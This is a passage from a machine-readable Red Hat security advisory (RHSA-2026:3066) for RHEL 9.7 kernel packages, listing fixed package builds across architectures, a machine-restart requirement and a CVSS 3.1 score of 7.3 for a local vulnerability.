"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3066"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
